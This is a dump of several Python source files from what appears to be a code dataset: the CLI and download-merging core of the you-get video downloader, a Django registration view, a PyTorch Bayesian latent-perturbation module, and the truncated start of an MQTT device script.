prefix is not None:\n title = \"[%s] %s\" % (prefix, title)\n output_filename = get_output_filename(urls, title, ext, output_dir, merge)\n output_filepath = os.path.join(output_dir, output_filename)\n\n if total_size:\n if not force and os.path.exists(output_filepath) and not auto_rename\\\n and (os.path.getsize(output_filepath) >= total_size * 0.9\\\n or skip_existing_file_size_check):\n if skip_existing_file_size_check:\n log.w('Skipping %s without checking size: file already exists' % output_filepath)\n else:\n log.w('Skipping %s: file already exists' % output_filepath)\n print()\n return\n bar = SimpleProgressBar(total_size, len(urls))\n else:\n bar = PiecesProgressBar(total_size, len(urls))\n\n if len(urls) == 1:\n url = urls[0]\n print('Downloading %s ...' % tr(output_filename))\n bar.update()\n url_save(\n url, output_filepath, bar, refer=refer, faker=faker,\n headers=headers, **kwargs\n )\n bar.done()\n else:\n parts = []\n print('Downloading %s ...' % tr(output_filename))\n bar.update()\n for i, url in enumerate(urls):\n output_filename_i = get_output_filename(urls, title, ext, output_dir, merge, part=i)\n output_filepath_i = os.path.join(output_dir, output_filename_i)\n parts.append(output_filepath_i)\n # print 'Downloading %s [%s/%s]...' % (tr(filename), i + 1, len(urls))\n bar.update_piece(i + 1)\n url_save(\n url, output_filepath_i, bar, refer=refer, is_part=True, faker=faker,\n headers=headers, **kwargs\n )\n bar.done()\n\n if not merge:\n print()\n return\n\n if 'av' in kwargs and kwargs['av']:\n from .processor.ffmpeg import has_ffmpeg_installed\n if has_ffmpeg_installed():\n from .processor.ffmpeg import ffmpeg_concat_av\n ret = ffmpeg_concat_av(parts, output_filepath, ext)\n print('Merged into %s' % output_filename)\n if ret == 0:\n for part in parts:\n os.remove(part)\n\n elif ext in ['flv', 'f4v']:\n try:\n from .processor.ffmpeg import has_ffmpeg_installed\n if has_ffmpeg_installed():\n from .processor.ffmpeg import ffmpeg_concat_flv_to_mp4\n ffmpeg_concat_flv_to_mp4(parts, output_filepath)\n else:\n from .processor.join_flv import concat_flv\n concat_flv(parts, output_filepath)\n print('Merged into %s' % output_filename)\n except:\n raise\n else:\n for part in parts:\n os.remove(part)\n\n elif ext == 'mp4':\n try:\n from .processor.ffmpeg import has_ffmpeg_installed\n if has_ffmpeg_installed():\n from .processor.ffmpeg import ffmpeg_concat_mp4_to_mp4\n ffmpeg_concat_mp4_to_mp4(parts, output_filepath)\n else:\n from .processor.join_mp4 import concat_mp4\n concat_mp4(parts, output_filepath)\n print('Merged into %s' % output_filename)\n except:\n raise\n else:\n for part in parts:\n os.remove(part)\n\n elif ext == 'ts':\n try:\n from .processor.ffmpeg import has_ffmpeg_installed\n if has_ffmpeg_installed():\n from .processor.ffmpeg import ffmpeg_concat_ts_to_mkv\n ffmpeg_concat_ts_to_mkv(parts, output_filepath)\n else:\n from .processor.join_ts import concat_ts\n concat_ts(parts, output_filepath)\n print('Merged into %s' % output_filename)\n except:\n raise\n else:\n for part in parts:\n os.remove(part)\n\n elif ext == 'mp3':\n try:\n from .processor.ffmpeg import has_ffmpeg_installed\n\n assert has_ffmpeg_installed()\n from .processor.ffmpeg import ffmpeg_concat_mp3_to_mp3\n ffmpeg_concat_mp3_to_mp3(parts, output_filepath)\n print('Merged into %s' % output_filename)\n except:\n raise\n else:\n for part in parts:\n os.remove(part)\n\n else:\n print(\"Can't merge %s files\" % ext)\n\n print()\n\n\ndef download_rtmp_url(\n url, title, ext, params={}, total_size=0, output_dir='.', refer=None,\n merge=True, faker=False\n):\n assert url\n if dry_run:\n print_user_agent(faker=faker)\n print('Real URL:\\n%s\\n' % [url])\n if params.get('-y', False): # None or unset -> False\n print('Real Playpath:\\n%s\\n' % [params.get('-y')])\n return\n\n if player:\n from .processor.rtmpdump import play_rtmpdump_stream\n play_rtmpdump_stream(player, url, params)\n return\n\n from .processor.rtmpdump import (\n has_rtmpdump_installed, download_rtmpdump_stream\n )\n assert has_rtmpdump_installed(), 'RTMPDump not installed.'\n download_rtmpdump_stream(url, title, ext, params, output_dir)\n\n\ndef download_url_ffmpeg(\n url, title, ext, params={}, total_size=0, output_dir='.', refer=None,\n merge=True, faker=False, stream=True\n):\n assert url\n if dry_run:\n print_user_agent(faker=faker)\n print('Real URL:\\n%s\\n' % [url])\n if params.get('-y', False): # None or unset ->False\n print('Real Playpath:\\n%s\\n' % [params.get('-y')])\n return\n\n if player:\n launch_player(player, [url])\n return\n\n from .processor.ffmpeg import has_ffmpeg_installed, ffmpeg_download_stream\n assert has_ffmpeg_installed(), 'FFmpeg not installed.'\n\n global output_filename\n if output_filename:\n dotPos = output_filename.rfind('.')\n if dotPos > 0:\n title = output_filename[:dotPos]\n ext = output_filename[dotPos+1:]\n else:\n title = output_filename\n\n title = tr(get_filename(title))\n\n ffmpeg_download_stream(url, title, ext, params, output_dir, stream=stream)\n\n\ndef playlist_not_supported(name):\n def f(*args, **kwargs):\n raise NotImplementedError('Playlist is not supported for ' + name)\n return f\n\n\ndef print_info(site_info, title, type, size, **kwargs):\n if json_output:\n json_output_.print_info(\n site_info=site_info, title=title, type=type, size=size\n )\n return\n if type:\n type = type.lower()\n if type in ['3gp']:\n type = 'video/3gpp'\n elif type in ['asf', 'wmv']:\n type = 'video/x-ms-asf'\n elif type in ['flv', 'f4v']:\n type = 'video/x-flv'\n elif type in ['mkv']:\n type = 'video/x-matroska'\n elif type in ['mp3']:\n type = 'audio/mpeg'\n elif type in ['mp4']:\n type = 'video/mp4'\n elif type in ['mov']:\n type = 'video/quicktime'\n elif type in ['ts']:\n type = 'video/MP2T'\n elif type in ['webm']:\n type = 'video/webm'\n\n elif type in ['jpg']:\n type = 'image/jpeg'\n elif type in ['png']:\n type = 'image/png'\n elif type in ['gif']:\n type = 'image/gif'\n\n if type in ['video/3gpp']:\n type_info = '3GPP multimedia file (%s)' % type\n elif type in ['video/x-flv', 'video/f4v']:\n type_info = 'Flash video (%s)' % type\n elif type in ['video/mp4', 'video/x-m4v']:\n type_info = 'MPEG-4 video (%s)' % type\n elif type in ['video/MP2T']:\n type_info = 'MPEG-2 transport stream (%s)' % type\n elif type in ['video/webm']:\n type_info = 'WebM video (%s)' % type\n # elif type in ['video/ogg']:\n # type_info = 'Ogg video (%s)' % type\n elif type in ['video/quicktime']:\n type_info = 'QuickTime video (%s)' % type\n elif type in ['video/x-matroska']:\n type_info = 'Matroska video (%s)' % type\n # elif type in ['video/x-ms-wmv']:\n # type_info = 'Windows Media video (%s)' % type\n elif type in ['video/x-ms-asf']:\n type_info = 'Advanced Systems Format (%s)' % type\n # elif type in ['video/mpeg']:\n # type_info = 'MPEG video (%s)' % type\n elif type in ['audio/mp4', 'audio/m4a']:\n type_info = 'MPEG-4 audio (%s)' % type\n elif type in ['audio/mpeg']:\n type_info = 'MP3 (%s)' % type\n elif type in ['audio/wav', 'audio/wave', 'audio/x-wav']:\n type_info = 'Waveform Audio File Format ({})'.format(type)\n\n elif type in ['image/jpeg']:\n type_info = 'JPEG Image (%s)' % type\n elif type in ['image/png']:\n type_info = 'Portable Network Graphics (%s)' % type\n elif type in ['image/gif']:\n type_info = 'Graphics Interchange Format (%s)' % type\n elif type in ['m3u8']:\n if 'm3u8_type' in kwargs:\n if kwargs['m3u8_type'] == 'master':\n type_info = 'M3U8 Master {}'.format(type)\n else:\n type_info = 'M3U8 Playlist {}'.format(type)\n else:\n type_info = 'Unknown type (%s)' % type\n\n maybe_print('Site: ', site_info)\n maybe_print('Title: ', unescape_html(tr(title)))\n print('Type: ', type_info)\n if type != 'm3u8':\n print(\n 'Size: ', round(size / 1048576, 2),\n 'MiB (' + str(size) + ' Bytes)'\n )\n if type == 'm3u8' and 'm3u8_url' in kwargs:\n print('M3U8 Url: {}'.format(kwargs['m3u8_url']))\n print()\n\n\ndef mime_to_container(mime):\n mapping = {\n 'video/3gpp': '3gp',\n 'video/mp4': 'mp4',\n 'video/webm': 'webm',\n 'video/x-flv': 'flv',\n }\n if mime in mapping:\n return mapping[mime]\n else:\n return mime.split('/')[1]\n\n\ndef parse_host(host):\n \"\"\"Parses host name and port number from a string.\n \"\"\"\n if re.match(r'^(\\d+)$', host) is not None:\n return (\"0.0.0.0\", int(host))\n if re.match(r'^(\\w+)://', host) is None:\n host = \"//\" + host\n o = parse.urlparse(host)\n hostname = o.hostname or \"0.0.0.0\"\n port = o.port or 0\n return (hostname, port)\n\n\ndef set_proxy(proxy):\n proxy_handler = request.ProxyHandler({\n 'http': '%s:%s' % proxy,\n 'https': '%s:%s' % proxy,\n })\n opener = request.build_opener(proxy_handler)\n request.install_opener(opener)\n\n\ndef unset_proxy():\n proxy_handler = request.ProxyHandler({})\n opener = request.build_opener(proxy_handler)\n request.install_opener(opener)\n\n\n# DEPRECATED in favor of set_proxy() and unset_proxy()\ndef set_http_proxy(proxy):\n if proxy is None: # Use system default setting\n proxy_support = request.ProxyHandler()\n elif proxy == '': # Don't use any proxy\n proxy_support = request.ProxyHandler({})\n else: # Use proxy\n proxy_support = request.ProxyHandler(\n {'http': '%s' % proxy, 'https': '%s' % proxy}\n )\n opener = request.build_opener(proxy_support)\n request.install_opener(opener)\n\n\ndef print_more_compatible(*args, **kwargs):\n import builtins as __builtin__\n \"\"\"Overload default print function as py (<3.3) does not support 'flush' keyword.\n Although the function name can be same as print to get itself overloaded automatically,\n I'd rather leave it with a different name and only overload it when importing to make less confusion.\n \"\"\"\n # nothing happens on py3.3 and later\n if sys.version_info[:2] >= (3, 3):\n return __builtin__.print(*args, **kwargs)\n\n # in lower pyver (e.g. 3.2.x), remove 'flush' keyword and flush it as requested\n doFlush = kwargs.pop('flush', False)\n ret = __builtin__.print(*args, **kwargs)\n if doFlush:\n kwargs.get('file', sys.stdout).flush()\n return ret\n\n\ndef download_main(download, download_playlist, urls, playlist, **kwargs):\n for url in urls:\n if re.match(r'https?://', url) is None:\n url = 'http://' + url\n\n if m3u8:\n if output_filename:\n title = output_filename\n else:\n title = \"m3u8file\"\n download_url_ffmpeg(url=url, title=title,ext = 'mp4',output_dir = '.')\n elif playlist:\n download_playlist(url, **kwargs)\n else:\n download(url, **kwargs)\n\n\ndef load_cookies(cookiefile):\n global cookies\n if cookiefile.endswith('.txt'):\n # MozillaCookieJar treats prefix '#HttpOnly_' as comments incorrectly!\n # do not use its load()\n # see also:\n # - https://docs.python.org/3/library/http.cookiejar.html#http.cookiejar.MozillaCookieJar\n # - https://github.com/python/cpython/blob/4b219ce/Lib/http/cookiejar.py#L2014\n # - https://curl.haxx.se/libcurl/c/CURLOPT_COOKIELIST.html#EXAMPLE\n #cookies = cookiejar.MozillaCookieJar(cookiefile)\n #cookies.load()\n from http.cookiejar import Cookie\n cookies = cookiejar.MozillaCookieJar()\n now = time.time()\n ignore_discard, ignore_expires = False, False\n with open(cookiefile, 'r', encoding='utf-8') as f:\n for line in f:\n # last field may be absent, so keep any trailing tab\n if line.endswith(\"\\n\"): line = line[:-1]\n\n # skip comments and blank lines XXX what is $ for?\n if (line.strip().startswith((\"#\", \"$\")) or\n line.strip() == \"\"):\n if not line.strip().startswith('#HttpOnly_'): # skip for #HttpOnly_\n continue\n\n domain, domain_specified, path, secure, expires, name, value = \\\n line.split(\"\\t\")\n secure = (secure == \"TRUE\")\n domain_specified = (domain_specified == \"TRUE\")\n if name == \"\":\n # cookies.txt regards 'Set-Cookie: foo' as a cookie\n # with no name, whereas http.cookiejar regards it as a\n # cookie with no value.\n name = value\n value = None\n\n initial_dot = domain.startswith(\".\")\n if not line.strip().startswith('#HttpOnly_'): # skip for #HttpOnly_\n assert domain_specified == initial_dot\n\n discard = False\n if expires == \"\":\n expires = None\n discard = True\n\n # assume path_specified is false\n c = Cookie(0, name, value,\n None, False,\n domain, domain_specified, initial_dot,\n path, False,\n secure,\n expires,\n discard,\n None,\n None,\n {})\n if not ignore_discard and c.discard:\n continue\n if not ignore_expires and c.is_expired(now):\n continue\n cookies.set_cookie(c)\n\n elif cookiefile.endswith(('.sqlite', '.sqlite3')):\n import sqlite3, shutil, tempfile\n temp_dir = tempfile.gettempdir()\n temp_cookiefile = os.path.join(temp_dir, 'temp_cookiefile.sqlite')\n shutil.copy2(cookiefile, temp_cookiefile)\n\n cookies = cookiejar.MozillaCookieJar()\n con = sqlite3.connect(temp_cookiefile)\n cur = con.cursor()\n cur.execute(\"\"\"SELECT host, path, isSecure, expiry, name, value\n FROM moz_cookies\"\"\")\n for item in cur.fetchall():\n c = cookiejar.Cookie(\n 0, item[4], item[5], None, False, item[0],\n item[0].startswith('.'), item[0].startswith('.'),\n item[1], False, item[2], item[3], item[3] == '', None,\n None, {},\n )\n cookies.set_cookie(c)\n\n else:\n log.e('[error] unsupported cookies format')\n # TODO: Chromium Cookies\n # SELECT host_key, path, secure, expires_utc, name, encrypted_value\n # FROM cookies\n # http://n8henrie.com/2013/11/use-chromes-cookies-for-easier-downloading-with-python-requests/\n\n\ndef set_socks_proxy(proxy):\n try:\n import socks\n if '@' in proxy:\n proxy_info = proxy.split(\"@\")\n socks_proxy_addrs = proxy_info[1].split(':')\n socks_proxy_auth = proxy_info[0].split(\":\")\n socks.set_default_proxy(\n socks.SOCKS5,\n socks_proxy_addrs[0],\n int(socks_proxy_addrs[1]),\n True,\n socks_proxy_auth[0],\n socks_proxy_auth[1]\n )\n else:\n socks_proxy_addrs = proxy.split(':')\n socks.set_default_proxy(\n socks.SOCKS5,\n socks_proxy_addrs[0],\n int(socks_proxy_addrs[1]),\n )\n socket.socket = socks.socksocket\n\n def getaddrinfo(*args):\n return [\n (socket.AF_INET, socket.SOCK_STREAM, 6, '', (args[0], args[1]))\n ]\n socket.getaddrinfo = getaddrinfo\n except ImportError:\n log.w(\n 'Error importing PySocks library, socks proxy ignored.'\n 'In order to use use socks proxy, please install PySocks.'\n )\n\n\ndef script_main(download, download_playlist, **kwargs):\n logging.basicConfig(format='[%(levelname)s] %(message)s')\n\n def print_version():\n version = get_version(\n kwargs['repo_path'] if 'repo_path' in kwargs else __version__\n )\n log.i(\n 'version {}, a tiny downloader that scrapes the web.'.format(\n version\n )\n )\n\n parser = argparse.ArgumentParser(\n prog='you-get',\n usage='you-get [OPTION]... URL...',\n description='A tiny downloader that scrapes the web',\n add_help=False,\n )\n parser.add_argument(\n '-V', '--version', action='store_true',\n help='Print version and exit'\n )\n parser.add_argument(\n '-h', '--help', action='store_true',\n help='Print this help message and exit'\n )\n\n dry_run_grp = parser.add_argument_group(\n 'Dry-run options', '(no actual downloading)'\n )\n dry_run_grp = dry_run_grp.add_mutually_exclusive_group()\n dry_run_grp.add_argument(\n '-i', '--info', action='store_true', help='Print extracted information'\n )\n dry_run_grp.add_argument(\n '-u', '--url', action='store_true',\n help='Print extracted information with URLs'\n )\n dry_run_grp.add_argument(\n '--json', action='store_true',\n help='Print extracted URLs in JSON format'\n )\n\n download_grp = parser.add_argument_group('Download options')\n download_grp.add_argument(\n '-n', '--no-merge', action='store_true', default=False,\n help='Do not merge video parts'\n )\n download_grp.add_argument(\n '--no-caption', action='store_true',\n help='Do not download captions (subtitles, lyrics, danmaku, ...)'\n )\n download_grp.add_argument(\n '--post', '--postfix', dest='postfix', action='store_true', default=False,\n help='Postfix downloaded files with unique identifiers'\n )\n download_grp.add_argument(\n '--pre', '--prefix', dest='prefix', metavar='PREFIX', default=None,\n help='Prefix downloaded files with string'\n )\n download_grp.add_argument(\n '-f', '--force', action='store_true', default=False,\n help='Force overwriting existing files'\n )\n download_grp.add_argument(\n '--skip-existing-file-size-check', action='store_true', default=False,\n help='Skip existing file without checking file size'\n )\n download_grp.add_argument(\n '-F', '--format', metavar='STREAM_ID',\n help='Set video format to STREAM_ID'\n )\n download_grp.add_argument(\n '-O', '--output-filename', metavar='FILE', help='Set output filename'\n )\n download_grp.add_argument(\n '-o', '--output-dir', metavar='DIR', default='.',\n help='Set output directory'\n )\n download_grp.add_argument(\n '-p', '--player', metavar='PLAYER',\n help='Stream extracted URL to a PLAYER'\n )\n download_grp.add_argument(\n '-c', '--cookies', metavar='COOKIES_FILE',\n help='Load cookies.txt or cookies.sqlite'\n )\n download_grp.add_argument(\n '-t', '--timeout', metavar='SECONDS', type=int, default=600,\n help='Set socket timeout'\n )\n download_grp.add_argument(\n '-d', '--debug', action='store_true',\n help='Show traceback and other debug info'\n )\n download_grp.add_argument(\n '-I', '--input-file', metavar='FILE', type=argparse.FileType('r'),\n help='Read non-playlist URLs from FILE'\n )\n download_grp.add_argument(\n '-P', '--password', help='Set video visit password to PASSWORD'\n )\n download_grp.add_argument(\n '-l', '--playlist', action='store_true',\n help='Prefer to download a playlist'\n )\n\n playlist_grp = parser.add_argument_group('Playlist optional options')\n playlist_grp.add_argument(\n '--first', metavar='FIRST',\n help='the first number'\n )\n playlist_grp.add_argument(\n '--last', metavar='LAST',\n help='the last number'\n )\n playlist_grp.add_argument(\n '--size', '--page-size', metavar='PAGE_SIZE',\n help='the page size number'\n )\n\n download_grp.add_argument(\n '-a', '--auto-rename', action='store_true', default=False,\n help='Auto rename same name different files'\n )\n\n download_grp.add_argument(\n '-k', '--insecure', action='store_true', default=False,\n help='ignore ssl errors'\n )\n\n proxy_grp = parser.add_argument_group('Proxy options')\n proxy_grp = proxy_grp.add_mutually_exclusive_group()\n proxy_grp.add_argument(\n '-x', '--http-proxy', metavar='HOST:PORT',\n help='Use an HTTP proxy for downloading'\n )\n proxy_grp.add_argument(\n '-y', '--extractor-proxy', metavar='HOST:PORT',\n help='Use an HTTP proxy for extracting only'\n )\n proxy_grp.add_argument(\n '--no-proxy', action='store_true', help='Never use a proxy'\n )\n proxy_grp.add_argument(\n '-s', '--socks-proxy', metavar='HOST:PORT or USERNAME:PASSWORD@HOST:PORT',\n help='Use an SOCKS5 proxy for downloading'\n )\n\n download_grp.add_argument('--stream', help=argparse.SUPPRESS)\n download_grp.add_argument('--itag', help=argparse.SUPPRESS)\n\n download_grp.add_argument('-m', '--m3u8', action='store_true', default=False,\n help = 'download video using an m3u8 url')\n\n\n parser.add_argument('URL', nargs='*', help=argparse.SUPPRESS)\n\n args = parser.parse_args()\n\n if args.help:\n print_version()\n parser.print_help()\n sys.exit()\n if args.version:\n print_version()\n sys.exit()\n\n if args.debug:\n # Set level of root logger to DEBUG\n logging.getLogger().setLevel(logging.DEBUG)\n\n global force\n global skip_existing_file_size_check\n global dry_run\n global json_output\n global player\n global extractor_proxy\n global output_filename\n global auto_rename\n global insecure\n global m3u8\n global postfix\n global prefix\n output_filename = args.output_filename\n extractor_proxy = args.extractor_proxy\n\n info_only = args.info\n if args.force:\n force = True\n if args.skip_existing_file_size_check:\n skip_existing_file_size_check = True\n if args.auto_rename:\n auto_rename = True\n if args.url:\n dry_run = True\n if args.json:\n json_output = True\n # to fix extractors not use VideoExtractor\n dry_run = True\n info_only = False\n\n if args.cookies:\n load_cookies(args.cookies)\n\n if args.m3u8:\n m3u8 = True\n\n caption = True\n stream_id = args.format or args.stream or args.itag\n if args.no_caption:\n caption = False\n if args.player:\n player = args.player\n caption = False\n\n if args.insecure:\n # ignore ssl\n insecure = True\n\n postfix = args.postfix\n prefix = args.prefix\n\n if args.no_proxy:\n set_http_proxy('')\n else:\n set_http_proxy(args.http_proxy)\n if args.socks_proxy:\n set_socks_proxy(args.socks_proxy)\n\n URLs = []\n if args.input_file:\n logging.debug('you are trying to load urls from %s', args.input_file)\n if args.playlist:\n log.e(\n \"reading playlist from a file is unsupported \"\n \"and won't make your life easier\"\n )\n sys.exit(2)\n URLs.extend(args.input_file.read().splitlines())\n args.input_file.close()\n URLs.extend(args.URL)\n\n if not URLs:\n parser.print_help()\n sys.exit()\n\n socket.setdefaulttimeout(args.timeout)\n\n try:\n extra = {'args': args}\n if extractor_proxy:\n extra['extractor_proxy'] = extractor_proxy\n if stream_id:\n extra['stream_id'] = stream_id\n download_main(\n download, download_playlist,\n URLs, args.playlist,\n output_dir=args.output_dir, merge=not args.no_merge,\n info_only=info_only, json_output=json_output, caption=caption,\n password=args.password,\n **extra\n )\n except KeyboardInterrupt:\n if args.debug:\n raise\n else:\n sys.exit(1)\n except UnicodeEncodeError:\n if args.debug:\n raise\n log.e(\n '[error] oops, the current environment does not seem to support '\n 'Unicode.'\n )\n log.e('please set it to a UTF-8-aware locale first,')\n log.e(\n 'so as to save the video (with some Unicode characters) correctly.'\n )\n log.e('you can do it like this:')\n log.e(' (Windows) % chcp 65001 ')\n log.e(' (Linux) $ LC_CTYPE=en_US.UTF-8')\n sys.exit(1)\n except Exception:\n if not args.debug:\n log.e('[error] oops, something went wrong.')\n log.e(\n 'don\\'t panic, c\\'est la vie. please try the following steps:'\n )\n log.e(' (1) Rule out any network problem.')\n log.e(' (2) Make sure you-get is up-to-date.')\n log.e(' (3) Check if the issue is already known, on')\n log.e(' https://github.com/soimort/you-get/wiki/Known-Bugs')\n log.e(' https://github.com/soimort/you-get/issues')\n log.e(' (4) Run the command with \\'--debug\\' option,')\n log.e(' and report this issue with the full output.')\n else:\n print_version()\n log.i(args)\n raise\n sys.exit(1)\n\n\ndef google_search(url):\n keywords = r1(r'https?://(.*)', url)\n url = 'https://www.google.com/search?tbm=vid&q=%s' % parse.quote(keywords)\n page = get_content(url, headers=fake_headers)\n videos = re.findall(\n r'(https://www\\.youtube\\.com/watch\\?v=[\\w-]+)', page\n )\n print('Best matched result:')\n return(videos[0])\n\n\ndef url_to_module(url):\n try:\n video_host = r1(r'https?://([^/]+)/', url)\n video_url = r1(r'https?://[^/]+(.*)', url)\n assert video_host and video_url\n except AssertionError:\n url = google_search(url)\n video_host = r1(r'https?://([^/]+)/', url)\n video_url = r1(r'https?://[^/]+(.*)', url)\n\n if video_host.endswith('.com.cn') or video_host.endswith('.ac.cn'):\n video_host = video_host[:-3]\n domain = r1(r'(\\.[^.]+\\.[^.]+)$', video_host) or video_host\n assert domain, 'unsupported url: ' + url\n\n # all non-ASCII code points must be quoted (percent-encoded UTF-8)\n url = ''.join([ch if ord(ch) in range(128) else parse.quote(ch) for ch in url])\n video_host = r1(r'https?://([^/]+)/', url)\n video_url = r1(r'https?://[^/]+(.*)', url)\n\n k = r1(r'([^.]+)', domain)\n if k in SITES:\n return (\n import_module('.'.join(['you_get', 'extractors', SITES[k]])),\n url\n )\n else:\n try:\n location = get_location(url) # t.co isn't happy with fake_headers\n except:\n location = get_location(url, headers=fake_headers)\n\n if location and location != url and not location.startswith('/'):\n return url_to_module(location)\n else:\n return import_module('you_get.extractors.universal'), url\n\n\ndef any_download(url, **kwargs):\n m, url = url_to_module(url)\n m.download(url, **kwargs)\n\n\ndef any_download_playlist(url, **kwargs):\n m, url = url_to_module(url)\n m.download_playlist(url, **kwargs)\n\n\ndef main(**kwargs):\n script_main(any_download, any_download_playlist, **kwargs)\n","repo_name":"soimort/you-get","sub_path":"src/you_get/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":60789,"program_lang":"python","lang":"en","doc_type":"code","stars":48481,"dataset":"github-code","pt":"32"} +{"seq_id":"8858767876","text":"from django.contrib.auth.models import User\nfrom rest_framework import generics\nfrom rest_framework.permissions import IsAuthenticated, AllowAny\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import logout, login, authenticate\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nimport json\nfrom api import models\n\n\n\n\nclass RegisterView(generics.RetrieveAPIView):\n permission_classes = (AllowAny,)\n\n error_messages = {\n 'invalid': 'Please enter a valid username or password',\n 'disabled': 'Sorry, account suspended'\n }\n\n def _error_response(self, message_key):\n data = json.dumps({\n 'success': False,\n 'message': self.error_messages[message_key],\n 'user_id': None,\n })\n\n @csrf_exempt\n def post(self, request):\n permission_classes = (AllowAny,)\n \"\"\"\n Purpose: Register a user\n Author: @rtwhitfield84\n \"\"\"\n\n # data = request.POST\n req_body = json.loads(request.body.decode())\n new_user = User.objects.create_user(\n username=req_body['username'],\n email=req_body['email'],\n password=req_body['password'],\n first_name=req_body['first_name'],\n last_name=req_body['last_name'],\n )\n # new_user = authenticate(username=new_user['username'], password=new_user['password'])\n models.Customer.objects.create(\n user=new_user,\n street_address=req_body['street_address'],\n city=req_body['city'],\n state=req_body['state'],\n zip_code=req_body['zip_code']\n )\n success = False\n if new_user is not None:\n if new_user.is_active:\n login(request, new_user)\n data = json.dumps({\n 'success': True,\n 'username': new_user.username,\n 'email': new_user.email,\n })\n return HttpResponse(data, content_type='application/json')\n\n return HttpResponse(self._error_response('disabled'), content_type='application/json')\n return HttpResponse(self._error_response('invalid'), content_type='application/json')","repo_name":"Karma-Khameleons/bangazon_api","sub_path":"bangazon/api/views/register_view.py","file_name":"register_view.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39652631543","text":"import torch\nfrom torch import nn\nimport torch.nn.functional as F\n\nfrom transformers.modeling_utils import PreTrainedModel\nfrom uncertain.dataloader import prepare_input, prepare_output\n\nfrom blitz.modules import BayesianLinear\n\nclass BNN(PreTrainedModel):\n def __init__(self, config, hidden_size, latent_size, **kwargs):\n super().__init__(config, **kwargs)\n\n self.hidden_size = hidden_size\n self.latent_size = latent_size\n\n self.bnn = BayesianLinear(config.hidden_size, self.latent_size, bias=False)\n self.linear = nn.Linear(self.latent_size,config.hidden_size, bias=False)\n\n self.cossim = nn.CosineSimilarity(dim=0, eps=1e-6)\n\n # Initialize weights and apply final processing\n self.post_init()\n\n def encoder(self, input):\n return self.bnn(input)\n \n def decoder(self, z):\n return self.linear(z)\n \n def latent_perturb(self, z):\n decoded_perturb = [[]] * z.size()[0]\n for i in range(0, self.latent_size):\n ### Create a zero matrix and assign each column with 1.o\n dz = torch.zeros(z.size()).to(self.device)\n dz[:,i] = 1.\n dz = dz * z\n decoded_dz = self.decoder(z=dz)\n for idx, vector in enumerate(decoded_dz):\n if len(decoded_perturb[idx]) == 0:\n decoded_perturb[idx] = [vector]\n else:\n decoded_perturb[idx] += [vector]\n return decoded_perturb\n \n def cos_word_by_dimension(self, x, hidden_states, perturbed_z, input_ids):\n results = {}\n for idx, each_dim in enumerate(perturbed_z):\n coss = torch.Tensor([prepare_input(float('inf')) if self.cos(each_dim,each) < float(0) else self.cos(each_dim,each) for each in hidden_states ])\n results.update({idx:[input_ids[torch.argmin(coss)],coss[torch.argmin(coss)]]})\n x_dim = torch.argmin(torch.Tensor([prepare_input(float('inf')) if self.cos(each_dim,x) < float(0) else self.cos(each_dim,x) for each_dim in perturbed_z ]))\n return results, x_dim\n \n def cos_dimension_by_word(self, x, hidden_states, perturbed_z, input_ids):\n results = {}\n for idx, each in enumerate(hidden_states):\n coss = torch.Tensor([prepare_input(float('inf')) if self.cos(each_dim,each) < float(0) else self.cos(each_dim,each) for each_dim in perturbed_z ])\n results.update({input_ids[idx]:[torch.argmin(coss), coss[torch.argmin(coss)]]})\n x_dim = torch.argmin(torch.Tensor([prepare_input(float('inf')) if self.cos(each_dim,x) < float(0) else self.cos(each_dim,x) for each_dim in perturbed_z ]))\n return results, x_dim\n \n def cos_delta_by_dimension(self, delta_x, perturbed_z, hidden_states):\n # start = input_ids.nonzero().min().item()\n # end = input_ids.nonzero().max().item()\n hidden_states = hidden_states\n # input_ids = input_ids[start:end][1:-1]\n # input_ids = input_ids[1:-1]\n delta_x_coss = torch.Tensor([prepare_input(float('inf')) if self.cossim(delta_x, each) < float(0) else self.cossim(delta_x, each) for each in perturbed_z])\n influntial_idx = torch.argmin(delta_x_coss)\n if torch.min(delta_x_coss) == float('inf'):\n delta_x_coss = torch.Tensor([self.cossim(delta_x, each) for each in perturbed_z])\n influntial_idx = torch.argmax(delta_x_coss)\n # word_coss = torch.Tensor([prepare_input(float('inf')) if self.cos(perturbed_z[influntial_idx], each) < float(0) else self.cos(perturbed_z[influntial_idx], each) for each in hidden_states])\n # word_idx = torch.argmin(word_coss)\n word_coss = [self.cossim(perturbed_z[influntial_idx], each) for each in hidden_states]\n return influntial_idx, delta_x_coss[influntial_idx], word_coss\n \n def cos_delta_by_dimension_batches(self, delta_x, perturbed_z, hidden_states):\n influntial_idxs, influntial_idx_coss, word_cosss = [], [], []\n for delta_x_, perturbed_z_, hidden_states_ in zip(delta_x, perturbed_z, hidden_states):\n influntial_idx, influntial_idx_cos, word_coss = self.cos_delta_by_dimension(delta_x_, perturbed_z_, hidden_states_)\n influntial_idxs.append(prepare_output(influntial_idx))\n influntial_idx_coss.append(prepare_output(influntial_idx_cos))\n word_cosss.append(prepare_output(word_coss))\n return influntial_idxs, influntial_idx_coss, word_cosss\n \n def recon_hidden_states(self, hidden_states):\n recon_hiddens = []\n for each_hidden_state in hidden_states:\n latent_z = self.encoder(each_hidden_state)\n recon_hidden_state = self.decoder(latent_z)\n recon_hiddens += [recon_hidden_state]\n return torch.stack(recon_hiddens)\n ","repo_name":"lijiazheng99/CUE","sub_path":"uncertain/models/utils/bnn.py","file_name":"bnn.py","file_ext":"py","file_size_in_byte":4806,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"27807916128","text":"\nimport aiohttp,aiofiles,asyncio,time,async_timeout,json\nfrom mqtt_send import send\nfrom network_scan import update_ip\nimport yolov4.detect\nimport time\nimport multiprocessing\nimport testtt\n\ndevices={'8:B6:1F:39:B2:FC':[\"0.0.0.0\",\"lost\"],'44:17:93:7E:3B:7C':[\"192.168.92.35\",\"lost\"],'8:B6:1F:39:AF:20':['0.0.0.0','lost']}\ndevices=update_ip(devices)\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\ndevices_color={\n 